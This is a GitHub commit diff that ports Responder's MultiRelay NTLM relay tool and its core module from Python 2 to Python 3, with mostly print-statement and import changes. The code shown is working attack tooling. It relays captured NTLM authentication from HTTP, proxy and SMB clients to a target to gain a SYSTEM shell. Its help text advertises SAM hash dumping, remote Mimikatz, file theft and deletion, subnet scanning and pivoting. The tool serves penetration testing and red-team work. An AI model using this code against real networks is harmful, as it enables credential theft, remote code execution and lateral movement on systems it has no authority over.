github/Responder
1
0
Fork 0
mirror of https://github.com/lgandx/Responder.git synced 2025-08-24 07:05:28 -07:00
Code Issues Projects Releases Packages Wiki Activity Actions

Updated MultiRelay and associated files for use with Python3

Browse source
This commit is contained in:
nbadev2 2020-12-30 16:25:31 -05:00
commit 65971d14ea
4 changed files with 338 additions and 338 deletions
Download patch file Download diff file Expand all files Collapse all files

240
tools/MultiRelay.py
View file

@ -23,17 +23,17 @@ import time
import random import random
import subprocess import subprocess
from threading import Thread from threading import Thread
from SocketServer import TCPServer, UDPServer, ThreadingMixIn, BaseRequestHandler from socketserver import TCPServer, UDPServer, ThreadingMixIn, BaseRequestHandler
try: try:
from Crypto.Hash import MD5 from Crypto.Hash import MD5
except ImportError: except ImportError:
print "\033[1;31m\nCrypto lib is not installed. You won't be able to live dump the hashes." print ("\033[1;31m\nCrypto lib is not installed. You won't be able to live dump the hashes.")
print "You can install it on debian based os with this command: apt-get install python-crypto" print ("You can install it on debian based os with this command: apt-get install python-crypto")
print "The Sam file will be saved anyway and you will have the bootkey.\033[0m\n" print ("The Sam file will be saved anyway and you will have the bootkey.\033[0m\n")
try: try:
import readline import readline
except: except:
print "Warning: readline module is not available, you will not be able to use the arrow keys for command history" print ("Warning: readline module is not available, you will not be able to use the arrow keys for command history")
pass pass
from MultiRelay.RelayMultiPackets import * from MultiRelay.RelayMultiPackets import *
from MultiRelay.RelayMultiCore import * from MultiRelay.RelayMultiCore import *
@ -72,18 +72,18 @@ parser.add_option('-d', '--dump', action="store_true", help="Dump hashes (script
options, args = parser.parse_args() options, args = parser.parse_args()
if options.TARGET is None: if options.TARGET is None:
print "\n-t Mandatory option is missing, please provide a target.\n" print ("\n-t Mandatory option is missing, please provide a target.\n")
parser.print_help() parser.print_help()
exit(-1) exit(-1)
if options.UserToRelay is None: if options.UserToRelay is None:
print "\n-u Mandatory option is missing, please provide a username to relay.\n" print ("\n-u Mandatory option is missing, please provide a username to relay.\n")
parser.print_help() parser.print_help()
exit(-1) exit(-1)
if options.ExtraPort is None: if options.ExtraPort is None:
options.ExtraPort = 0 options.ExtraPort = 0
if not os.geteuid() == 0: if not os.geteuid() == 0:
print color("[!] MultiRelay must be run as root.") print (color("[!] MultiRelay must be run as root."))
sys.exit(-1) sys.exit(-1)
OneCommand = options.OneCommand OneCommand = options.OneCommand
@ -98,46 +98,46 @@ Pivoting = [2]
def color(txt, code = 1, modifier = 0): def color(txt, code = 1, modifier = 0):
return "\033[%d;3%dm%s\033[0m" % (modifier, code, txt) return "\033[%d;3%dm%s\033[0m" % (modifier, code, txt)
def ShowWelcome(): def ShowWelcome():
print color('\nResponder MultiRelay %s NTLMv1/2 Relay' %(__version__),8,1) print (color('\nResponder MultiRelay %s NTLMv1/2 Relay' %(__version__),8,1))
print '\nSend bugs/hugs/comments to: laurent.gaffie@gmail.com' print ('\nSend bugs/hugs/comments to: laurent.gaffie@gmail.com')
print 'Usernames to relay (-u) are case sensitive.' print ('Usernames to relay (-u) are case sensitive.')
print 'To kill this script hit CTRL-C.\n' print ('To kill this script hit CTRL-C.\n')
print color('/*',8,1) print (color('/*',8,1))
print 'Use this script in combination with Responder.py for best results.' print ('Use this script in combination with Responder.py for best results.')
print 'Make sure to set SMB and HTTP to OFF in Responder.conf.\n' print ('Make sure to set SMB and HTTP to OFF in Responder.conf.\n')
print 'This tool listen on TCP port 80, 3128 and 445.' print ('This tool listen on TCP port 80, 3128 and 445.')
print 'For optimal pwnage, launch Responder only with these 2 options:' print ('For optimal pwnage, launch Responder only with these 2 options:')
print '-rv\nAvoid running a command that will likely prompt for information like net use, etc.' print ('-rv\nAvoid running a command that will likely prompt for information like net use, etc.')
print 'If you do so, use taskkill (as system) to kill the process.' print ('If you do so, use taskkill (as system) to kill the process.')
print color('*/',8,1) print (color('*/',8,1))
print color('\nRelaying credentials for these users:',8,1) print (color('\nRelaying credentials for these users:',8,1))
print color(UserToRelay,4,1) print (color(UserToRelay,4,1))
print '\n' print ('\n')
ShowWelcome() ShowWelcome()
def ShowHelp(): def ShowHelp():
print color('Available commands:',8,0) print (color('Available commands:',8,0))
print color('dump',8,1)+' -> Extract the SAM database and print hashes.' print (color('dump',8,1)+' -> Extract the SAM database and print hashes.')
print color('regdump KEY',8,1)+' -> Dump an HKLM registry key (eg: regdump SYSTEM)' print (color('regdump KEY',8,1)+' -> Dump an HKLM registry key (eg: regdump SYSTEM)')
print color('read Path_To_File',8,1)+' -> Read a file (eg: read /windows/win.ini)' print (color('read Path_To_File',8,1)+' -> Read a file (eg: read /windows/win.ini)')
print color('get Path_To_File',8,1)+' -> Download a file (eg: get users/administrator/desktop/password.txt)' print (color('get Path_To_File',8,1)+' -> Download a file (eg: get users/administrator/desktop/password.txt)')
print color('delete Path_To_File',8,1)+'-> Delete a file (eg: delete /windows/temp/executable.exe)' print (color('delete Path_To_File',8,1)+'-> Delete a file (eg: delete /windows/temp/executable.exe)')
print color('upload Path_To_File',8,1)+'-> Upload a local file (eg: upload /home/user/bk.exe), files will be uploaded in \\windows\\temp\\' print (color('upload Path_To_File',8,1)+'-> Upload a local file (eg: upload /home/user/bk.exe), files will be uploaded in \\windows\\temp\\')
print color('runas Command',8,1)+' -> Run a command as the currently logged in user. (eg: runas whoami)' print (color('runas Command',8,1)+' -> Run a command as the currently logged in user. (eg: runas whoami)')
print color('scan /24',8,1)+' -> Scan (Using SMB) this /24 or /16 to find hosts to pivot to' print (color('scan /24',8,1)+' -> Scan (Using SMB) this /24 or /16 to find hosts to pivot to')
print color('pivot IP address',8,1)+' -> Connect to another host (eg: pivot 10.0.0.12)' print (color('pivot IP address',8,1)+' -> Connect to another host (eg: pivot 10.0.0.12)')
print color('mimi command',8,1)+' -> Run a remote Mimikatz 64 bits command (eg: mimi coffee)' print (color('mimi command',8,1)+' -> Run a remote Mimikatz 64 bits command (eg: mimi coffee)')
print color('mimi32 command',8,1)+' -> Run a remote Mimikatz 32 bits command (eg: mimi coffee)' print (color('mimi32 command',8,1)+' -> Run a remote Mimikatz 32 bits command (eg: mimi coffee)')
print color('lcmd command',8,1)+' -> Run a local command and display the result in MultiRelay shell (eg: lcmd ifconfig)' print (color('lcmd command',8,1)+' -> Run a local command and display the result in MultiRelay shell (eg: lcmd ifconfig)')
print color('help',8,1)+' -> Print this message.' print (color('help',8,1)+' -> Print this message.')
print color('exit',8,1)+' -> Exit this shell and return in relay mode.' print (color('exit',8,1)+' -> Exit this shell and return in relay mode.')
print ' If you want to quit type exit and then use CTRL-C\n' print (' If you want to quit type exit and then use CTRL-C\n')
print color('Any other command than that will be run as SYSTEM on the target.\n',8,1) print (color('Any other command than that will be run as SYSTEM on the target.\n',8,1))
Logs_Path = os.path.abspath(os.path.join(os.path.dirname(__file__)))+"/../" Logs_Path = os.path.abspath(os.path.join(os.path.dirname(__file__)))+"/../"
Logs = logging Logs = logging
@ -153,7 +153,7 @@ def UploadContent(File):
try: try:
RunFinger(Host[0]) RunFinger(Host[0])
except: except:
print "The host %s seems to be down or port 445 down."%(Host[0]) print ("The host %s seems to be down or port 445 down."%(Host[0]))
sys.exit(1) sys.exit(1)
@ -190,7 +190,7 @@ def ConnectToTarget():
except: except:
try: try:
sys.exit(1) sys.exit(1)
print "Cannot connect to target, host down?" print ("Cannot connect to target, host down?")
except: except:
pass pass
@ -219,45 +219,45 @@ class HTTPProxyRelay(BaseRequestHandler):
NTLM_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data) NTLM_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data)
##Make sure incoming packet is an NTLM auth, if not send HTTP 407. ##Make sure incoming packet is an NTLM auth, if not send HTTP 407.
if NTLM_Auth: if NTLM_Auth:
#Get NTLM Message code. (1:negotiate, 2:challenge, 3:auth) #Get NTLM Message code. (1:negotiate, 2:challenge, 3:auth)
Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9] Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9]
if Packet_NTLM == "\x01": if Packet_NTLM == "\x01":
## SMB Block. Once we get an incoming NTLM request, we grab the ntlm challenge from the target. ## SMB Block. Once we get an incoming NTLM request, we grab the ntlm challenge from the target.
h = SMBHeader(cmd="\x72",flag1="\x18", flag2="\x43\xc8") h = SMBHeader(cmd="\x72",flag1="\x18", flag2="\x43\xc8")
n = SMBNegoCairo(Data = SMBNegoCairoData()) n = SMBNegoCairo(Data = SMBNegoCairoData())
n.calculate() n.calculate()
packet0 = str(h)+str(n) packet0 = str(h)+str(n)
buffer0 = longueur(packet0)+packet0 buffer0 = longueur(packet0)+packet0
s.send(buffer0) s.send(buffer0)
smbdata = s.recv(2048) smbdata = s.recv(2048)
##Session Setup AndX Request, NTLMSSP_NEGOTIATE ##Session Setup AndX Request, NTLMSSP_NEGOTIATE
if smbdata[8:10] == "\x72\x00": if smbdata[8:10] == "\x72\x00":
head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x43\xc8",mid="\x02\x00") head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x43\xc8",mid="\x02\x00")
t = SMBSessionSetupAndxNEGO(Data=b64decode(''.join(NTLM_Auth)))# t = SMBSessionSetupAndxNEGO(Data=b64decode(''.join(NTLM_Auth)))#
t.calculate() t.calculate()
packet1 = str(head)+str(t) packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1 buffer1 = longueur(packet1)+packet1
s.send(buffer1) s.send(buffer1)
smbdata = s.recv(2048) #got it here. smbdata = s.recv(2048) #got it here.
## Send HTTP Proxy ## Send HTTP Proxy
Buffer_Ans = WPAD_NTLM_Challenge_Ans() Buffer_Ans = WPAD_NTLM_Challenge_Ans()
Buffer_Ans.calculate(str(ExtractRawNTLMPacket(smbdata)))#Retrieve challenge message from smb Buffer_Ans.calculate(str(ExtractRawNTLMPacket(smbdata)))#Retrieve challenge message from smb
key = ExtractHTTPChallenge(smbdata,Pivoting)#Grab challenge key for later use (hash parsing). key = ExtractHTTPChallenge(smbdata,Pivoting)#Grab challenge key for later use (hash parsing).
self.request.send(str(Buffer_Ans)) #We send NTLM message 2 to the client. self.request.send(str(Buffer_Ans)) #We send NTLM message 2 to the client.
data = self.request.recv(8092) data = self.request.recv(8092)
NTLM_Proxy_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data) NTLM_Proxy_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data)
Packet_NTLM = b64decode(''.join(NTLM_Proxy_Auth))[8:9] Packet_NTLM = b64decode(''.join(NTLM_Proxy_Auth))[8:9]
##Got NTLM Message 3 from client. ##Got NTLM Message 3 from client.
if Packet_NTLM == "\x03": if Packet_NTLM == "\x03":
NTLM_Auth = b64decode(''.join(NTLM_Proxy_Auth)) NTLM_Auth = b64decode(''.join(NTLM_Proxy_Auth))
##Might be anonymous, verify it and if so, send no go to client. ##Might be anonymous, verify it and if so, send no go to client.
if IsSMBAnonymous(NTLM_Auth): if IsSMBAnonymous(NTLM_Auth):
Response = WPAD_Auth_407_Ans() Response = WPAD_Auth_407_Ans()
self.request.send(str(Response)) self.request.send(str(Response))
data = self.request.recv(8092) data = self.request.recv(8092)
else: else:
#Let's send that NTLM auth message to ParseSMBHash which will make sure this user is allowed to login #Let's send that NTLM auth message to ParseSMBHash which will make sure this user is allowed to login
@ -270,24 +270,24 @@ class HTTPProxyRelay(BaseRequestHandler):
t.calculate() t.calculate()
packet1 = str(head)+str(t) packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1 buffer1 = longueur(packet1)+packet1
print "[+] SMB Session Auth sent." print ("[+] SMB Session Auth sent.")
s.send(buffer1) s.send(buffer1)
smbdata = s.recv(2048) smbdata = s.recv(2048)
RunCmd = RunShellCmd(smbdata, s, self.client_address[0], Host, Username, Domain) RunCmd = RunShellCmd(smbdata, s, self.client_address[0], Host, Username, Domain)
if RunCmd is None: if RunCmd is None:
s.close() s.close()
self.request.close() self.request.close()
return None return None
else: else:
##Any other type of request, send a 407. ##Any other type of request, send a 407.
Response = WPAD_Auth_407_Ans() Response = WPAD_Auth_407_Ans()
self.request.send(str(Response)) self.request.send(str(Response))
except Exception: except Exception:
self.request.close() self.request.close()
##No need to print anything (timeouts, rst, etc) to the user console.. ##No need to print anything (timeouts, rst, etc) to the user console..
pass pass
class HTTPRelay(BaseRequestHandler): class HTTPRelay(BaseRequestHandler):
@ -316,11 +316,11 @@ class HTTPRelay(BaseRequestHandler):
NTLM_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data) NTLM_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data)
##Make sure incoming packet is an NTLM auth, if not send HTTP 407. ##Make sure incoming packet is an NTLM auth, if not send HTTP 407.
if NTLM_Auth: if NTLM_Auth:
#Get NTLM Message code. (1:negotiate, 2:challenge, 3:auth) #Get NTLM Message code. (1:negotiate, 2:challenge, 3:auth)
Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9] Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9]
if Packet_NTLM == "\x01": if Packet_NTLM == "\x01":
## SMB Block. Once we get an incoming NTLM request, we grab the ntlm challenge from the target. ## SMB Block. Once we get an incoming NTLM request, we grab the ntlm challenge from the target.
h = SMBHeader(cmd="\x72",flag1="\x18", flag2="\x43\xc8") h = SMBHeader(cmd="\x72",flag1="\x18", flag2="\x43\xc8")
n = SMBNegoCairo(Data = SMBNegoCairoData()) n = SMBNegoCairo(Data = SMBNegoCairoData())
@ -340,21 +340,21 @@ class HTTPRelay(BaseRequestHandler):
smbdata = s.recv(2048) #got it here. smbdata = s.recv(2048) #got it here.
## Send HTTP Response. ## Send HTTP Response.
Buffer_Ans = IIS_NTLM_Challenge_Ans() Buffer_Ans = IIS_NTLM_Challenge_Ans()
Buffer_Ans.calculate(str(ExtractRawNTLMPacket(smbdata)))#Retrieve challenge message from smb Buffer_Ans.calculate(str(ExtractRawNTLMPacket(smbdata)))#Retrieve challenge message from smb
key = ExtractHTTPChallenge(smbdata,Pivoting)#Grab challenge key for later use (hash parsing). key = ExtractHTTPChallenge(smbdata,Pivoting)#Grab challenge key for later use (hash parsing).
self.request.send(str(Buffer_Ans)) #We send NTLM message 2 to the client. self.request.send(str(Buffer_Ans)) #We send NTLM message 2 to the client.
data = self.request.recv(8092) data = self.request.recv(8092)
NTLM_Proxy_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data) NTLM_Proxy_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data)
Packet_NTLM = b64decode(''.join(NTLM_Proxy_Auth))[8:9] Packet_NTLM = b64decode(''.join(NTLM_Proxy_Auth))[8:9]
##Got NTLM Message 3 from client. ##Got NTLM Message 3 from client.
if Packet_NTLM == "\x03": if Packet_NTLM == "\x03":
NTLM_Auth = b64decode(''.join(NTLM_Proxy_Auth)) NTLM_Auth = b64decode(''.join(NTLM_Proxy_Auth))
##Might be anonymous, verify it and if so, send no go to client. ##Might be anonymous, verify it and if so, send no go to client.
if IsSMBAnonymous(NTLM_Auth): if IsSMBAnonymous(NTLM_Auth):
Response = IIS_Auth_401_Ans() Response = IIS_Auth_401_Ans()
self.request.send(str(Response)) self.request.send(str(Response))
data = self.request.recv(8092) data = self.request.recv(8092)
else: else:
#Let's send that NTLM auth message to ParseSMBHash which will make sure this user is allowed to login #Let's send that NTLM auth message to ParseSMBHash which will make sure this user is allowed to login
@ -367,25 +367,25 @@ class HTTPRelay(BaseRequestHandler):
t.calculate() t.calculate()
packet1 = str(head)+str(t) packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1 buffer1 = longueur(packet1)+packet1
print "[+] SMB Session Auth sent." print ("[+] SMB Session Auth sent.")
s.send(buffer1) s.send(buffer1)
smbdata = s.recv(2048) smbdata = s.recv(2048)
RunCmd = RunShellCmd(smbdata, s, self.client_address[0], Host, Username, Domain) RunCmd = RunShellCmd(smbdata, s, self.client_address[0], Host, Username, Domain)
if RunCmd is None: if RunCmd is None:
s.close() s.close()
self.request.close() self.request.close()
return None return None
else: else:
##Any other type of request, send a 401. ##Any other type of request, send a 401.
Response = IIS_Auth_401_Ans() Response = IIS_Auth_401_Ans()
self.request.send(str(Response)) self.request.send(str(Response))
except Exception: except Exception:
self.request.close() self.request.close()
##No need to print anything (timeouts, rst, etc) to the user console.. ##No need to print anything (timeouts, rst, etc) to the user console..
pass pass
class SMBRelay(BaseRequestHandler): class SMBRelay(BaseRequestHandler):
@ -456,11 +456,11 @@ class SMBRelay(BaseRequestHandler):
if Pivoting[0] == "1": if Pivoting[0] == "1":
pass pass
else: else:
print "[+] SMB Session Auth sent." print ("[+] SMB Session Auth sent.")
s.send(buffer1) s.send(buffer1)
smbdata = s.recv(4096) smbdata = s.recv(4096)
#We're all set, dropping into shell. #We're all set, dropping into shell.
RunCmd = RunShellCmd(smbdata, s, self.client_address[0], Host, Username, Domain) RunCmd = RunShellCmd(smbdata, s, self.client_address[0], Host, Username, Domain)
#If runcmd is None it's because tree connect was denied for this user. #If runcmd is None it's because tree connect was denied for this user.
#This will only happen once with that specific user account. #This will only happen once with that specific user account.
#Let's kill that connection so we can force him to reauth with another account. #Let's kill that connection so we can force him to reauth with another account.
@ -480,9 +480,9 @@ class SMBRelay(BaseRequestHandler):
return None return None
except Exception: except Exception:
self.request.close() self.request.close()
##No need to print anything (timeouts, rst, etc) to the user console.. ##No need to print anything (timeouts, rst, etc) to the user console..
pass pass
#Interface starts here. #Interface starts here.
@ -499,20 +499,20 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain):
# On this block we do some verifications before dropping the user into the shell. # On this block we do some verifications before dropping the user into the shell.
if data[8:10] == "\x73\x6d": if data[8:10] == "\x73\x6d":
print "[+] Relay failed, Logon Failure. This user doesn't have an account on this target." print ("[+] Relay failed, Logon Failure. This user doesn't have an account on this target.")
print "[+] Hashes were saved anyways in Responder/logs/ folder.\n" print ("[+] Hashes were saved anyways in Responder/logs/ folder.\n")
Logs.info(clientIP+":"+Username+":"+Domain+":"+Target[0]+":Logon Failure") Logs.info(clientIP+":"+Username+":"+Domain+":"+Target[0]+":Logon Failure")
del ShellOpen[:] del ShellOpen[:]
return False return False
if data[8:10] == "\x73\x8d": if data[8:10] == "\x73\x8d":
print "[+] Relay failed, STATUS_TRUSTED_RELATIONSHIP_FAILURE returned. Credentials are good, but user is probably not using the target domain name in his credentials.\n" print ("[+] Relay failed, STATUS_TRUSTED_RELATIONSHIP_FAILURE returned. Credentials are good, but user is probably not using the target domain name in his credentials.\n")
Logs.info(clientIP+":"+Username+":"+Domain+":"+Target[0]+":Logon Failure") Logs.info(clientIP+":"+Username+":"+Domain+":"+Target[0]+":Logon Failure")
del ShellOpen[:] del ShellOpen[:]
return False return False
if data[8:10] == "\x73\x5e": if data[8:10] == "\x73\x5e":
print "[+] Relay failed, NO_LOGON_SERVER returned. Credentials are probably good, but the PDC is either offline or inexistant.\n" print ("[+] Relay failed, NO_LOGON_SERVER returned. Credentials are probably good, but the PDC is either offline or inexistant.\n")
del ShellOpen[:] del ShellOpen[:]
return False return False
@ -533,14 +533,14 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain):
if Pivoting[0] == "1": if Pivoting[0] == "1":
pass pass
else: else:
print "[+] Relay Failed, Tree Connect AndX denied. This is a low privileged user or SMB Signing is mandatory.\n[+] Hashes were saved anyways in Responder/logs/ folder.\n" print ("[+] Relay Failed, Tree Connect AndX denied. This is a low privileged user or SMB Signing is mandatory.\n[+] Hashes were saved anyways in Responder/logs/ folder.\n")
Logs.info(clientIP+":"+Username+":"+Domain+":"+Target[0]+":Logon Failure") Logs.info(clientIP+":"+Username+":"+Domain+":"+Target[0]+":Logon Failure")
del ShellOpen[:] del ShellOpen[:]
return False return False
# This one should not happen since we always use the IP address of the target in our tree connects, but just in case.. # This one should not happen since we always use the IP address of the target in our tree connects, but just in case..
if data[8:10] == "\x75\xcc": if data[8:10] == "\x75\xcc":
print "[+] Tree Connect AndX denied. Bad Network Name returned." print ("[+] Tree Connect AndX denied. Bad Network Name returned.")
del ShellOpen[:] del ShellOpen[:]
return False return False
@ -549,7 +549,7 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain):
if Pivoting[0] == "1": if Pivoting[0] == "1":
pass pass
else: else:
print "[+] Looks good, "+Username+" has admin rights on C$." print ("[+] Looks good, "+Username+" has admin rights on C$.")
head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x04\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x04\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
t = SMBTreeConnectData(Path="\\\\"+Target[0]+"\\IPC$") t = SMBTreeConnectData(Path="\\\\"+Target[0]+"\\IPC$")
t.calculate() t.calculate()
@ -560,12 +560,12 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain):
## Run one command. ## Run one command.
if data[8:10] == "\x75\x00" and OneCommand != None or Dump: if data[8:10] == "\x75\x00" and OneCommand != None or Dump:
print "[+] Authenticated." print ("[+] Authenticated.")
if OneCommand != None: if OneCommand != None:
print "[+] Running command: %s"%(OneCommand) print ("[+] Running command: %s"%(OneCommand))
RunCmd(data, s, clientIP, Username, Domain, OneCommand, Logs, Target[0]) RunCmd(data, s, clientIP, Username, Domain, OneCommand, Logs, Target[0])
if Dump: if Dump:
print "[+] Dumping hashes" print ("[+] Dumping hashes")
DumpHashes(data, s, Target[0]) DumpHashes(data, s, Target[0])
os._exit(1) os._exit(1)
@ -574,10 +574,10 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain):
if Pivoting[0] == "1": if Pivoting[0] == "1":
pass pass
else: else:
print "[+] Authenticated.\n[+] Dropping into Responder's interactive shell, type \"exit\" to terminate\n" print ("[+] Authenticated.\n[+] Dropping into Responder's interactive shell, type \"exit\" to terminate\n")
ShowHelp() ShowHelp()
Logs.info("Client:"+clientIP+", "+Domain+"\\"+Username+" --> Target: "+Target[0]+" -> Shell acquired") Logs.info("Client:"+clientIP+", "+Domain+"\\"+Username+" --> Target: "+Target[0]+" -> Shell acquired")
print color('Connected to %s as LocalSystem.'%(Target[0]),2,1) print (color('Connected to %s as LocalSystem.'%(Target[0]),2,1))
while True: while True:
@ -617,7 +617,7 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain):
Help = re.findall('^help', Cmd[0]) Help = re.findall('^help', Cmd[0])
if Cmd[0] == "exit": if Cmd[0] == "exit":
print "[+] Returning in relay mode." print ("[+] Returning in relay mode.")
del Cmd[:] del Cmd[:]
del ShellOpen[:] del ShellOpen[:]
return None return None
@ -647,7 +647,7 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain):
data = WriteFile(data, s, File, FileSize, FileContent, Target[0]) data = WriteFile(data, s, File, FileSize, FileContent, Target[0])
del Cmd[:] del Cmd[:]
else: else:
print File+" does not exist, please specify a valid file." print (File+" does not exist, please specify a valid file.")
del Cmd[:] del Cmd[:]
if Delete: if Delete:
@ -669,7 +669,7 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain):
data = RunAsCmd(data, s, clientIP, Username, Domain, Exec, Logs, Target[0], FileName) data = RunAsCmd(data, s, clientIP, Username, Domain, Exec, Logs, Target[0], FileName)
del Cmd[:] del Cmd[:]
else: else:
print RunAsFileName+" does not exist, please specify a valid file." print (RunAsFileName+" does not exist, please specify a valid file.")
del Cmd[:] del Cmd[:]
if LCmd: if LCmd:
@ -685,7 +685,7 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain):
data = RunMimiCmd(data, s, clientIP, Username, Domain, Exec, Logs, Target[0],FileName) data = RunMimiCmd(data, s, clientIP, Username, Domain, Exec, Logs, Target[0],FileName)
del Cmd[:] del Cmd[:]
else: else:
print MimikatzFilename+" does not exist, please specify a valid file." print (MimikatzFilename+" does not exist, please specify a valid file.")
del Cmd[:] del Cmd[:]
if Mimi32: if Mimi32:
@ -697,12 +697,12 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain):
data = RunMimiCmd(data, s, clientIP, Username, Domain, Exec, Logs, Target[0],FileName) data = RunMimiCmd(data, s, clientIP, Username, Domain, Exec, Logs, Target[0],FileName)
del Cmd[:] del Cmd[:]
else: else:
print Mimikatzx86Filename+" does not exist, please specify a valid file." print (Mimikatzx86Filename+" does not exist, please specify a valid file.")
del Cmd[:] del Cmd[:]
if Pivot: if Pivot:
if Pivot[0] == Target[0]: if Pivot[0] == Target[0]:
print "[Pivot Verification Failed]: You're already on this host. No need to pivot." print ("[Pivot Verification Failed]: You're already on this host. No need to pivot.")
del Pivot[:] del Pivot[:]
del Cmd[:] del Cmd[:]
else: else:
@ -718,7 +718,7 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain):
Status, data = VerifyPivot(data, s, clientIP, Username, Domain, Pivot[0], Logs, Target[0], RunAsPath, FileName) Status, data = VerifyPivot(data, s, clientIP, Username, Domain, Pivot[0], Logs, Target[0], RunAsPath, FileName)
if Status == True: if Status == True:
print "[+] Pivoting to %s."%(Pivot[0]) print ("[+] Pivoting to %s."%(Pivot[0]))
if os.path.isfile(RunAsFileName): if os.path.isfile(RunAsFileName):
FileSize, FileContent = UploadContent(RunAsFileName) FileSize, FileContent = UploadContent(RunAsFileName)
data = WriteFile(data, s, FileName, FileSize, FileContent, Target[0]) data = WriteFile(data, s, FileName, FileSize, FileContent, Target[0])
@ -734,11 +734,11 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain):
return None return None
if Status == False: if Status == False:
print "[Pivot Verification Failed]: This user doesn't have enough privileges on "+Pivot[0]+" to pivot. Try another host." print ("[Pivot Verification Failed]: This user doesn't have enough privileges on "+Pivot[0]+" to pivot. Try another host.")
del Cmd[:] del Cmd[:]
del Pivot[:] del Pivot[:]
else: else:
print RunAsFileName+" does not exist, please specify a valid file." print (RunAsFileName+" does not exist, please specify a valid file.")
del Cmd[:] del Cmd[:]
if Scan: if Scan:
@ -762,11 +762,11 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain):
data = RunCmd(data, s, clientIP, Username, Domain, Cmd[0], Logs, Target[0], RunPath,FileName) data = RunCmd(data, s, clientIP, Username, Domain, Cmd[0], Logs, Target[0], RunPath,FileName)
del Cmd[:] del Cmd[:]
else: else:
print SysSVCFileName+" does not exist, please specify a valid file." print (SysSVCFileName+" does not exist, please specify a valid file.")
del Cmd[:] del Cmd[:]
if data is None: if data is None:
print "\033[1;31m\nSomething went wrong, the server dropped the connection.\nMake sure (\\Windows\\Temp\\) is clean on the server\033[0m\n" print ("\033[1;31m\nSomething went wrong, the server dropped the connection.\nMake sure (\\Windows\\Temp\\) is clean on the server\033[0m\n")
if data[8:10] == "\x2d\x34":#We confirmed with OpenAndX that no file remains after the execution of the last command. We send a tree connect IPC and land at the begining of the command loop. if data[8:10] == "\x2d\x34":#We confirmed with OpenAndX that no file remains after the execution of the last command. We send a tree connect IPC and land at the begining of the command loop.
head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x04\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x04\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
@ -789,7 +789,7 @@ def serve_thread_tcp(host, port, handler):
server = ThreadingTCPServer((host, port), handler) server = ThreadingTCPServer((host, port), handler)
server.serve_forever() server.serve_forever()
except: except:
print color('Error starting TCP server on port '+str(port)+ ', check permissions or other servers running.', 1, 1) print (color('Error starting TCP server on port '+str(port)+ ', check permissions or other servers running.', 1, 1))
def main(): def main():
try: try:

372
tools/MultiRelay/RelayMultiCore.py
View file

@ -24,7 +24,7 @@ import re
import datetime import datetime
import threading import threading
import uuid import uuid
from RelayMultiPackets import * from MultiRelay.RelayMultiPackets import *
from odict import OrderedDict from odict import OrderedDict
from base64 import b64decode, b64encode from base64 import b64decode, b64encode
sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), 'creddump'))) sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), 'creddump')))
@ -57,17 +57,17 @@ class Packet():
# Function used to write captured hashs to a file. # Function used to write captured hashs to a file.
def WriteData(outfile, data, user): def WriteData(outfile, data, user):
if not os.path.isfile(outfile): if not os.path.isfile(outfile):
with open(outfile,"w") as outf: with open(outfile,"w") as outf:
outf.write(data + '\n') outf.write(data + '\n')
return return
with open(outfile,"r") as filestr: with open(outfile,"r") as filestr:
if re.search(user.encode('hex'), filestr.read().encode('hex')): if re.search(user.encode('hex'), filestr.read().encode('hex')):
return False return False
elif re.search(re.escape("$"), user): elif re.search(re.escape("$"), user):
return False return False
with open(outfile,"a") as outf2: with open(outfile,"a") as outf2:
outf2.write(data + '\n') outf2.write(data + '\n')
#Function used to verify if a previous auth attempt was made. #Function used to verify if a previous auth attempt was made.
def ReadData(Outfile, Client, User, Domain, Target, cmd): def ReadData(Outfile, Client, User, Domain, Target, cmd):
@ -75,7 +75,7 @@ def ReadData(Outfile, Client, User, Domain, Target, cmd):
with open(Logs_Path+"logs/"+Outfile,"r") as filestr: with open(Logs_Path+"logs/"+Outfile,"r") as filestr:
Login = Client+":"+User+":"+Domain+":"+Target+":Logon Failure" Login = Client+":"+User+":"+Domain+":"+Target+":Logon Failure"
if re.search(Login.encode('hex'), filestr.read().encode('hex')): if re.search(Login.encode('hex'), filestr.read().encode('hex')):
print "[+] User %s\\%s previous login attempt returned logon_failure. Not forwarding anymore to prevent account lockout\n"%(Domain,User) print ("[+] User %s\\%s previous login attempt returned logon_failure. Not forwarding anymore to prevent account lockout\n"%(Domain,User))
return True return True
else: else:
